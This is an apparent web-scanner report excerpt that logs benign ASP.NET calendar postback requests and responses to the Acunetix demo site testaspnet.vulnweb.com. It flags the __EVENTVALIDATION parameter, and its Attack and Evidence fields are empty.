Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8193&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgAATqoYSNoIZGRkvaY8Mw%2Bi3isAAtg8AuvWqm%2BZBmA%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLyt8%2B8BgK646%2FsDgKcisLvAQK%2Fk6foDAK%2Fk6foDAK%2Fk9uMBAK%2Fk9uMBAK%2Fk8%2BjDQK%2Fk8%2BjDQK%2Fk%2BPGBgK%2Fk%2BPGBgK%2Fk9evAwK%2Fk9evAwK%2Fk8vCDAK%2Fk8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6%2FSUCkLqR%2BAkCkLqR%2BAkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ%2FJwKAtfZ%2FJwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w8WHTN7s2Oyge10yTyvc196UvM4ZQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:03:39 GMT Content-Length: 12444
Response Body - size: 12,444 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgAATqoYSNoIZGRkvaY8Mw+i3isAAtg8AuvWqm+ZBmA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLyt8+8BgK646/sDgKcisLvAQK/k6foDAK/k6foDAK/k9uMBAK/k9uMBAK/k8+jDQK/k8+jDQK/k+PGBgK/k+PGBgK/k9evAwK/k9evAwK/k8vCDAK/k8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6/SUCkLqR+AkCkLqR+AkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ/JwKAtfZ/JwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w8WHTN7s2Oyge10yTyvc196UvM4ZQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:White" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1187 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,187 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8288&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgBAjGe%2FktoIZGRktud27ob6n4gdF4a780JbldUtGEA%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLYvLrBDwLtiZ78CwLHkIz%2BDgKK%2BZ%2FNDAKK%2BZ%2FNDAKK%2BbPgBQKK%2BbPgBQKK%2BaeHDQKK%2BaeHDQKK%2BZvsCwKK%2BZvsCwKK%2BY%2BDAwKK%2BY%2BDAwK%2Fk%2FvECQK%2Fk%2FvECQK%2Fk%2B%2BbAQK%2Fk%2B%2BbAQK%2Fk4O%2BCgK%2Fk4O%2BCgK%2Fk7fVAwK%2Fk7fVAwK%2Fk6voDAK%2Fk6voDAK%2Fk9%2BMBAK%2Fk9%2BMBAK%2Fk%2FOjDQK%2Fk%2FOjDQK%2Fk%2BfGBgK%2Fk%2BfGBgK%2Fk9uvAwK%2Fk9uvAwK%2Fk8%2FCDAK%2Fk8%2FCDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV%2BAkCkLqV%2BAkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgApMzzHd7rR5%2FrV%2F%2F7XkJxW1yERZF
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:14:47 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgBAjGe/ktoIZGRktud27ob6n4gdF4a780JbldUtGEA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLYvLrBDwLtiZ78CwLHkIz+DgKK+Z/NDAKK+Z/NDAKK+bPgBQKK+bPgBQKK+aeHDQKK+aeHDQKK+ZvsCwKK+ZvsCwKK+Y+DAwKK+Y+DAwK/k/vECQK/k/vECQK/k++bAQK/k++bAQK/k4O+CgK/k4O+CgK/k7fVAwK/k7fVAwK/k6voDAK/k6voDAK/k9+MBAK/k9+MBAK/k/OjDQK/k/OjDQK/k+fGBgK/k+fGBgK/k9uvAwK/k9uvAwK/k8/CDAK/k8/CDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV+AkCkLqV+AkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgApMzzHd7rR5/rV//7XkJxW1yERZF" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:White" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to 